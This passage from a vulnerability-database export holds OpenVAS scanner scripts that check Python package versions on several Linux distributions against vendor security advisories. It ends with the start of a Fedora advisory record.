isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "description": "Oracle Linux Local Security Checks ELSA-2015-1064", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1064", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310122870", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122870", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero 
Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122870\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 14:01:39 +0200 (Fri, 05 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1064\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1064.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el7\", 
rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if 
((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-11-20T00:00:00", "type": "openvas", "title": "RedHat Update for python RHSA-2015:2101-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871501", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for python 
RHSA-2015:2101-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871501\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-20 06:24:47 +0100 (Fri, 20 Nov 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for python RHSA-2015:2101-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Python is an interpreted, interactive,\nobject-oriented programming language often compared to Tcl, Perl, 
Scheme, or\nJava. Python includes modules, classes, exceptions, very high level dynamic\ndata types and dynamic typing. Python supports interfaces to many system calls\nand libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and\nMFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. 
(CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n * Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an 'Invalid\nargument' error. Subprocesses h ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"python on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2101-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00019.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-debuginfo\", rpm:\"python-debuginfo~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.el7\", 
rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:49", "description": "Gentoo Linux Local Security Checks GLSA 201503-10", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201503-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-9365"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121364", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121364", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201503-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121364\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:40 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201503-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201503-10\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201503-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 
3.3.5-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.9-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.10\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.11\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.12\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.14\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.15\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(), vulnerable: make_list(\"lt 3.3.5-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:39:52", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for python (EulerOS-SA-2019-1434)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2183", "CVE-2019-9636", "CVE-2016-0772", "CVE-2013-4238", "CVE-2018-1060", "CVE-2009-2408", "CVE-2016-5636", "CVE-2019-9948", "CVE-2014-7185", "CVE-2018-1061", "CVE-2018-14647", "CVE-2014-4616", "CVE-2013-1752", "CVE-2019-5010", "CVE-2017-1000158", "CVE-2016-5699", "CVE-2014-9365"], 
"modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191434", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191434", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1434\");\n script_version(\"2020-01-23T11:46:15+0000\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-4238\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\", \"CVE-2016-0772\", \"CVE-2016-2183\", \"CVE-2016-5636\", \"CVE-2016-5699\", \"CVE-2017-1000158\", \"CVE-2018-1060\", \"CVE-2018-1061\", \"CVE-2018-14647\", \"CVE-2019-5010\", \"CVE-2019-9636\", \"CVE-2019-9948\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:46:15 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:46:15 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for python (EulerOS-SA-2019-1434)\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1434\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1434\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'python' package(s) announced via the EulerOS-SA-2019-1434 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that Python's smtplib library did not return an exception when StartTLS failed to be established in the SMTP.starttls() function. A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer.(CVE-2016-0772)\n\nA vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later 'import' statement could cause a heap overflow, leading to arbitrary code execution.(CVE-2016-5636)\n\nA flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.(CVE-2016-2183)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. 
A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data.(CVE-2014-9365)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.(CVE-2014-7185)\n\nA flaw was found in the way catastrophic backtracking was implemented in python's pop3lib's apop() method. An attacker could use this flaw to cause denial of service.(CVE-2018-1060)\n\nThe ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.(CVE-2013-4238)\n\nIt was found that the Python's httplib library (used by urllib, urllib2 and others) did not properly check HTTPConnection.putheader() function arguments. An attacker could use this flaw to inject additional headers in a Python application that allowed user provided header names or values.(CVE-2016-5699)\n\nCPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)(CVE-2017-1000158)\n\nA flaw was found in the way cat ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'python' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~69.h19\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. 
Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-06-30T10:31:50", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python-2.7.5-13.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-06-30T10:31:50", "id": "FEDORA:F219C21A3D", "href": "", 